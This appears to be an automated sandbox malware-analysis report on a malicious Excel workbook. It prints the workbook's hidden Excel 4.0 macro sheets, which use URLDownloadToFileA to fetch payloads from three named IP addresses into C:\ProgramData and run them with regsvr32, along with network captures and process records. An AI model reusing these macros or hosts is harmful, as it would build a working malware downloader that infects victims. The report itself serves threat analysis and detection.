                                                                                                                                                    File size:270134
                                                                                                                                                    MD5:8759fc7692ec7716642f6d871ab096a7
                                                                                                                                                    SHA1:929f1adad990aa9ea0f6f34f963a2fd69bd10a7b
                                                                                                                                                    SHA256:d91a7c07bec1136e7117642acd349bdbc7e21cdb4abf1eda8914dac94d5eb0f9
                                                                                                                                                    SHA512:1991ff0fbd6f5b328c49e85de1de6d27fd91f3612437355c39d28ccaec5fbc378f79035635c7eb1da8aafcf972095e18f2903e064e78a5ab2ba59d6885eb5d9c
                                                                                                                                                    SSDEEP:6144:NVafQTxwGF4p24e6RoPmj6M7R6SFENKq4Wneb:zacxGgF62PFNJnq
                                                                                                                                                    File Content Preview:PK..........!.........=.......[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4
                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1
                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:
                                                                                                                                                    Name:Tiposa1111
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa11114False0Falsepre21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
                                                                                                                                                    Name:Tiposa
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa3False0Falsepre1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
                                                                                                                                                    Name:Tiposa3
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa34False0Falsepre14,7,=GOTO(Detr!K18)
                                                                                                                                                    Name:Tiposa6
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa64False0Falsepre19,7,=GOTO(Tiposa2!H20)
                                                                                                                                                    Name:Detr
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Detr4False0Falsepost25,10,=GOTO(Xwtrd!G18)
                                                                                                                                                    Name:Detr
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Detr4False0Falsepre25,10,=GOTO(Xwtrd!G18)
                                                                                                                                                    Name:Tiposa2
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa24False0Falsepre14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
                                                                                                                                                    Name:Vtreytr
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Vtreytr4False0Falsepost21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
                                                                                                                                                    Name:Vtreytr
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Vtreytr4False0Falsepre21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
                                                                                                                                                    Name:Xwtrd2
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Xwtrd23False0Falsepost16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/2437620704597850.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
                                                                                                                                                    Name:Xwtrdferyy
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Xwtrdferyy3False0Falsepre13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/7332413132139490.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
                                                                                                                                                    Name:Tiposa11111
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa111114False0Falsepre11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
                                                                                                                                                    Name:Tiposa11111
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa111114False0Falsepost11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
                                                                                                                                                    Name:Xwtrd
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Xwtrd3False0Falsepost20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/2437620704597850.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
                                                                                                                                                    Name:Xwtrd
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Xwtrd3False0Falsepre20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/7332413132139490.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
                                                                                                                                                    Name:Tiposa3
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa34False0Falsepost14,7,=GOTO(Detr!K18)
                                                                                                                                                    Name:Tiposa1
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa14False0Falsepost10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
                                                                                                                                                    Name:Tiposa
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa3False0Falsepost1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
                                                                                                                                                    Name:Tiposa6
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa64False0Falsepost19,7,=GOTO(Tiposa2!H20)
                                                                                                                                                    Name:Xwtrd2
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Xwtrd23False0Falsepre16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/7332413132139490.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
                                                                                                                                                    Name:Tiposa2
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa24False0Falsepost14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
                                                                                                                                                    Name:Xwtrdferyy
                                                                                                                                                    Type:3
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Xwtrdferyy3False0Falsepost13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/2437620704597850.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
                                                                                                                                                    Name:Tiposa1
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa14False0Falsepre10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
                                                                                                                                                    Name:Tiposa1111
                                                                                                                                                    Type:4
                                                                                                                                                    Final:False
                                                                                                                                                    Visible:False
                                                                                                                                                    Protected:False
                                                                                                                                                    Tiposa11114False0Falsepost21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    02/15/22-18:15:06.646794TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.141.26.236192.168.2.22
                                                                                                                                                    02/15/22-18:15:06.821739TCP1201ATTACK-RESPONSES 403 Forbidden8049168185.252.215.41192.168.2.22
                                                                                                                                                    02/15/22-18:15:07.067612TCP1201ATTACK-RESPONSES 403 Forbidden8049169188.165.62.32192.168.2.22
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 15, 2022 18:20:55.629968882 CET4975080192.168.2.3185.141.26.236
                                                                                                                                                    Feb 15, 2022 18:20:55.669344902 CET8049750185.141.26.236192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:55.669475079 CET4975080192.168.2.3185.141.26.236
                                                                                                                                                    Feb 15, 2022 18:20:55.669987917 CET4975080192.168.2.3185.141.26.236
                                                                                                                                                    Feb 15, 2022 18:20:55.709125042 CET8049750185.141.26.236192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:55.888829947 CET8049750185.141.26.236192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:55.891109943 CET4975080192.168.2.3185.141.26.236
                                                                                                                                                    Feb 15, 2022 18:20:55.898205996 CET4975180192.168.2.3185.252.215.41
                                                                                                                                                    Feb 15, 2022 18:20:55.925575972 CET8049751185.252.215.41192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:55.925704002 CET4975180192.168.2.3185.252.215.41
                                                                                                                                                    Feb 15, 2022 18:20:55.926214933 CET4975180192.168.2.3185.252.215.41
                                                                                                                                                    Feb 15, 2022 18:20:55.953632116 CET8049751185.252.215.41192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:56.059762955 CET8049751185.252.215.41192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:56.060631990 CET4975180192.168.2.3185.252.215.41
                                                                                                                                                    Feb 15, 2022 18:20:56.068445921 CET4975280192.168.2.3188.165.62.32
                                                                                                                                                    Feb 15, 2022 18:20:56.095077991 CET8049752188.165.62.32192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:56.095289946 CET4975280192.168.2.3188.165.62.32
                                                                                                                                                    Feb 15, 2022 18:20:56.095776081 CET4975280192.168.2.3188.165.62.32
                                                                                                                                                    Feb 15, 2022 18:20:56.122576952 CET8049752188.165.62.32192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:56.261297941 CET8049752188.165.62.32192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:20:56.261419058 CET4975280192.168.2.3188.165.62.32
                                                                                                                                                    Feb 15, 2022 18:22:00.886729002 CET8049750185.141.26.236192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:22:00.887490988 CET4975080192.168.2.3185.141.26.236
                                                                                                                                                    Feb 15, 2022 18:22:01.061841011 CET8049751185.252.215.41192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:22:01.062139034 CET4975180192.168.2.3185.252.215.41
                                                                                                                                                    Feb 15, 2022 18:22:01.263998985 CET8049752188.165.62.32192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:22:01.264370918 CET4975280192.168.2.3188.165.62.32
                                                                                                                                                    Feb 15, 2022 18:22:39.580533028 CET4975280192.168.2.3188.165.62.32
                                                                                                                                                    Feb 15, 2022 18:22:39.580777884 CET4975180192.168.2.3185.252.215.41
                                                                                                                                                    Feb 15, 2022 18:22:39.581008911 CET4975080192.168.2.3185.141.26.236
                                                                                                                                                    Feb 15, 2022 18:22:39.607186079 CET8049752188.165.62.32192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:22:39.607894897 CET8049751185.252.215.41192.168.2.3
                                                                                                                                                    Feb 15, 2022 18:22:39.620245934 CET8049750185.141.26.236192.168.2.3
                                                                                                                                                    • 185.141.26.236
                                                                                                                                                    • 185.252.215.41
                                                                                                                                                    • 188.165.62.32
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349750185.141.26.23680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 15, 2022 18:20:55.669987917 CET1192OUTGET /2437620704597850.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 185.141.26.236
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 15, 2022 18:20:55.888829947 CET1193INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 15 Feb 2022 17:21:36 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 548
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.349751185.252.215.4180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 15, 2022 18:20:55.926214933 CET1193OUTGET /2437620704597850.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 185.252.215.41
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 15, 2022 18:20:56.059762955 CET1194INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 15 Feb 2022 17:20:56 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 548
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.349752188.165.62.3280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 15, 2022 18:20:56.095776081 CET1195OUTGET /2437620704597850.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 188.165.62.32
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 15, 2022 18:20:56.261297941 CET1195INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 15 Feb 2022 17:20:56 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 548
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:18:20:48
                                                                                                                                                    Start date:15/02/2022
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                    Imagebase:0xf70000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:18:20:56
                                                                                                                                                    Start date:15/02/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 C:\ProgramData\Hroser1.ocx
                                                                                                                                                    Imagebase:0x1060000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:18:20:57
                                                                                                                                                    Start date:15/02/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 C:\ProgramData\Hroser2.ocx
                                                                                                                                                    Imagebase:0x1060000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
